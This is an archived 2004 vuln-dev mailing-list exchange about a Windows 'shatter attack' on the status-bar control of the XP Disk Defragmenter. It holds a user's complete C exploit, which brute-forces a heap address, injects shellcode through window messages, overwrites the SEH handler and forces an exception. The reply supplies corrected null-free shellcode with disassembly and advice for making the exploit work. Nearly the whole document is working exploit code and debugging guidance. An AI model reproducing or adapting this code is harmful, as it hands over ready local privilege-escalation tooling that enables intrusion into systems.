Vulnerability Development mailing list archives
RE: status-bar SHATTER attack
From: "Brett Moore" <brett.moore () security-assessment com>
Date: Thu, 8 Jul 2004 10:29:54 +1200
Hey,
can anyone pls point me where i'm wrong ??
Sure Original demo states // Local No Null Cmd Shellcode. This is because you can't send 0x00 with this statusbar exploit Your shellcode contains nulls. Try this code which is updated to use a system address of 0x77c28044 = "\x90\x33\xc9\x66\xb9\x36\x32\xc1\xe1\x09\x66\xb9\x63\x6d\x51\x54\xbb\xe1\x1 2\x5e\x77\x03\xd9\xff\xd3\xcc\x90"; And remove your code that plugs the address into the shellcode. Or you can be smart and keep your shellcode modification code but update it so if affects the shellcode correctly. _exploit 00408030 90 nop 00408031 33 C9 xor ecx,ecx 00408033 66 B9 36 32 mov cx,3236h 00408037 C1 E1 09 shl ecx,9 0040803A 66 B9 63 6D mov cx,6D63h 0040803E 51 push ecx 0040803F 54 push esp 00408040 BB 5C 21 9D 77 mov ebx,775e125eh 00408045 03 D9 add ebx,ecx 00408047 FF D3 call ebx 00408049 CC int 3 So grab the address of system and subtract 0x646DE6 (cmd) then place into the byte array. or Remove the add ebx,ecx bytes and just put the proc address straight in or write your own shellcode, pretty sure I did it this way because at the time system had a null in its address. Either way, the code you sent works fine with that updated shellcode. Be sure to grab my shatter presentation+code from the Blackhat site after the conference if this stuff interest you. It will contain previously unreleased information and techniques. Brett Moore Network Intrusion Specialist, CTO Security-Assessment.com Ltd www.security-assessment.com -----Original Message----- From: bil_912 [mailto:bil_912 () coolgoose com] Sent: Thursday, July 08, 2004 10:00 AM To: vuln-dev () securityfocus com Subject: status-bar SHATTER attack
hello all, recently i was playing with >> STATUS-BAR <<
shatter-attack-code provided
by brett.moore () security-assessment com the code with tiny modifications is attached here. the problem is ... xp.sp1 TOP SEH at 0x77ed73b4 was getting overwritten as 0x77ed74c0 where
my
shellcode is residing. but even after that the code didnt get executed. i was attacking the "disk defragmenter" utility which come with windows XP. can anyone pls point me where i'm wrong ?? thank u. [ i'm attaching a screen-shot of my desktop when attacking ]
//=========================================================================
/*************************************************************************** **** ******
* Statusbar Control Shatter exploit * * Demonstrates the use of a combination of windows messages to; * - brute force a useable heap address * - place structure information inside a process * - inject shellcode to known location * - overwrite 4 bytes of a critical memory address * * 4 Variables need to be set for proper execution. * - tWindow is the title of the programs main window * - sehHandler is the critical address to overwrite * - shellcodeaddr is the data space to inject the code * - heapaddr is the base heap address to start brute forcing * * Local shellcode is Win2kSp4 ENG Hardcoded because of unicode issues * Try it out against any program with a progress bar *
**************************************************************************** **** *****/
#include <windows.h> #include <commctrl.h> #include <stdio.h> // Local No Null Cmd Shellcode. BYTE exploit[]
="\x90\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1\xcc";
char g_classNameBuf[ 256 ];
char tWindow[]="disk defragmenter";
long sehHandler = 0x77ed73b4; // Critical Address To Overwrite
long shellcodeaddr = 0x77ed74c0; // Known Writeable Space Or Global Space
unsigned long heapaddr = 0x00100000; // Base Heap Address
long mainhWnd;
void doWrite(HWND hWnd, long tByte,long address);
void BruteForceHeap(HWND hWnd);
void IterateWindows(long hWnd);
int main(int argc, char *argv[])
{
HMODULE hMod;
DWORD ProcAddr;
long x;
//making the shellcode ready
hMod = LoadLibrary("msvcrt.dll");
ProcAddr = (DWORD)GetProcAddress(hMod, "system");
if(ProcAddr != 0)
*(long *)&exploit[8] = ProcAddr;
//***************************
//printf("+ Enter Window Title\n",tWindow);
//flushall();
//gets(tWindow);
if (argc == 2)
sscanf(argv[1],"%lx",&heapaddr);// Oddity
printf("%% Using base heap address...0x%xh\n",heapaddr);
printf("+ Finding %s Window...\n",tWindow);
mainhWnd = (long)FindWindow(NULL,tWindow);
if(mainhWnd == NULL)
{
printf("+ Couldn't Find %s Window\n",tWindow);
return 0;
}
printf("+ Found Main Window At......0x%xh\n",mainhWnd);
IterateWindows(mainhWnd);
printf("+ Done...\n");
return 0;
}
void IterateWindows(long hWnd)
{
long childhWnd,looper;
childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);
while (childhWnd != NULL)
{
IterateWindows(childhWnd);
childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT);
}
GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) );
if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0)
{
// Find Heap Address
BruteForceHeap((HWND) hWnd);
//printf("+ Enter heapaddr : \n");
//scanf("%lx",&heapaddr);
// Inject shellcode to known address
printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr);
for (looper=0;looper<sizeof(exploit);looper++)
doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper));
// Overwrite SEH
printf("+ Overwriting Top SEH.......0x%xh\n",sehHandler);
doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler);
doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1);
doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2);
doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3);
// Cause exception
printf("+ Forcing Unhandled Exception\n");
getch();
SendMessage((HWND) hWnd,(UINT) PBM_GETRANGE,0,1); //PROGRESSS_BAR
SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1);
printf("+ Done...\n");
exit(0);
}
}
void BruteForceHeap(HWND hWnd, long tByte,long address)
{
long retval;
BOOL foundHeap = FALSE;
char buffer[5000];
memset(buffer,0,sizeof(buffer));
while (!foundHeap)
{
printf("+ Trying Heap Address.......0x%xh ",heapaddr);
memset(buffer,0x58,sizeof(buffer)-1); // settin to X
// Set Window Title
SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);
// Set Part Contents
SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr);
retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0);
printf("%d",retval);
if(retval == 1)
{
// First Retval should be 1
memset(buffer,0x80,sizeof(buffer)-1);
// Set Window Title
SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);
// Set Part Contents
SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr);
retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0);
if(retval > 1)
{
// Second should be larger than 1
printf(" : %d - Found Heap Address : 0x%x\n",retval,heapaddr);
return(0);
}
}
printf("\n");
heapaddr += 2500;
}
}
void doWrite(HWND hWnd, long tByte,long address)
{
char buffer[5000];
memset(buffer,0,sizeof(buffer));
memset(buffer,tByte,sizeof(buffer)-1);
// Set Window Title
SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);
// Set Statusbar width
SendMessage( hWnd,(UINT) SB_SETPARTS,1,heapaddr);
SendMessage( hWnd,(UINT) SB_GETPARTS,1,address);
}
//========================================================================= ###################################################################### CONFIDENTIALITY NOTICE: This message and any attachment(s) are confidential and proprietary. They may also be privileged or otherwise protected from disclosure. If you are not the intended recipient, advise the sender and delete this message and any attachment from your system. If you are not the intended recipient, you are not authorised to use or copy this message or attachment or disclose the contents to any other person. Views expressed are not necessarily endorsed by Security-Assessment.com Limited. Please note that this communication does not designate an information system for the purposes of the New Zealand Electronic Transactions Act 2003. ######################################################################
Current thread:
- status-bar SHATTER attack bil_912 (Jul 07)
- RE: status-bar SHATTER attack Brett Moore (Jul 08)